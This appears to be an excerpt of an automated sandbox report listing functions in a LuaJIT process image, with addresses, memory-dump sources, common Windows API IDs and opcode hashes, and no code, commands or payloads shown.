                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                                                                                                                                                                                              • Instruction ID: 5a220dd492be9780ea02bf9aedc9ea4d9c19a72589b9d465c18ee83b9cd3b502
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B52192B3A38A8147D760AF1AD440369B6A1AB84B58F981234E66D477D5DF7CDC10CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244AC60 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                                                                                                                                                                                              • Instruction ID: 26f0ecc4a67d9417cc976fc61e5a5986013bca9d829a6eabf57cf3111fd3c3e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA217C73A24B518AEB51AF65C4542EC77B0EB0470CF94493AD62C03B85DFB8D984CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244B114 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                                                                                                                                                                                              • Instruction ID: bec7b40c32770b89815262ec93c5fede071f3d1191f9d9c423dc893356aeef5f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99115123E3C58181FB51BA5794003BDE690BF45B80F944030EABC47686CEADED41CF21
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244B3A0 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                                                                                                                                                                                              • Instruction ID: a1ed5a59e8da0c4db20bd77db6cdecafa2760cd2eb26eafc17ca9f1422ae553c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65018E62B3878140EA04AB939801079E695BB95FE4F884631EE7C57BD6CEBCE841CB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245D534 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                                                                                                                                                                                              • Instruction ID: 90b368d90926e18253e16bf03fb6bd4ff9211be105b5b4bef1a74667d356d528
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E114C73A3864685EB05AB56D4502ACA760EF80764FD04132EABD062E5CFBCE841CF20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244AF18 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
                                                                                                                                                                                                                              • Instruction ID: b2c060d086221bde3c97184f95fd3c36eb7904883a69e02f8920bcfdb54b2222
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE018F63B3855241FF54BA6B982137D92909F45778FA40730FD7E4A2C6CEACEC41CA61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245921C Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF77245AB79,?,?,?,00007FF77244AF01,?,?,?,?,00007FF7724602A3), ref: 00007FF772459271
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                                                                                                                                                                                              • Instruction ID: 747fb3da6a5cfe272395c8e90111d4a3671ad891c6bb4eb754eb5c95a0398d60
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52F0A463B3920241FF5977A758103B4A2545F49780F880830DC6E8A695DD9CAE81CA70
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772394600 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2335118202-0
                                                                                                                                                                                                                              • Opcode ID: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                                                                                                                                                                                              • Instruction ID: 7dec3f593efb4073d2ed36e65e6bd2afbc22fecad469df309b38bbd39eea5769
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F01ED72A28B4981EA209B56E44032EA7A4F7C9788F500125EBDD47B65DF7DC150CF50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244AF9C Relevance: 1.5, APIs: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                                                                                                                                                                                              • Instruction ID: 10142ddde884194dab0fd51c97721274a63e59980b7446446cb1f3514ae5a420
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26F09023A3C54241FB14BA6BA4111B99190AF41790FE41230F97E462C3CEACEC41CA20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772385074 Relevance: 1.5, APIs: 1, Instructions: 30synchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutex
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1964310414-0
                                                                                                                                                                                                                              • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                                                                                                                                                                                              • Instruction ID: fa3459e5f7880de72c6ca26a3d41d2835e1e48d35278f7c2c0b42c07615c435b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21018C63224E8485DB05AF3AC4405ACB7B4FB08F8DB084266DF885732CEF35D545C760
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245A290 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF77245BC42,?,?,?,00007FF77244A3F4,?,?,?,00007FF77244A3BA,?,?,?,00007FF77244A541), ref: 00007FF77245A2CE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: 39557c8d86b2f5e8a4514c023374127acd5a2de89d3165a96a82d27ef446aa7c
                                                                                                                                                                                                                              • Instruction ID: 14b9ae7568d34976a2eaeac91c2afd827e5d2afe6a616761563e7c5997c16c51
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39557c8d86b2f5e8a4514c023374127acd5a2de89d3165a96a82d27ef446aa7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7F05E03B3961641FA1437A3585237591905F897A0FA80230ECBE8A3C2DEDDAC82DE30
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723DADE0 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF7723DAF20,?,?,?,?,00007FF7723DAABE), ref: 00007FF7723DAE07
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                              • Opcode ID: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                                                                                                                                                                                              • Instruction ID: b43b62d62158a244a82704fcc342b1cf9dd9c5fdfa7b6c6188ed15abc2843b55
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48E0C97262C68186D720DF15E44021AFBB0F784784F900529EADC43B18CBBDD668CF40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723DAD30 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                              • Opcode ID: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                                                                                                                                                                                              • Instruction ID: bd16b5d2f8079ba5227b72a8accb24217a66d580ada5a6520f6696a06b55a0ca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2F0B272A28A8482D720AB15F48071AFBB4F795788F504529EADD13B68CFBDC565CF40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723DADA0 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1263568516-0
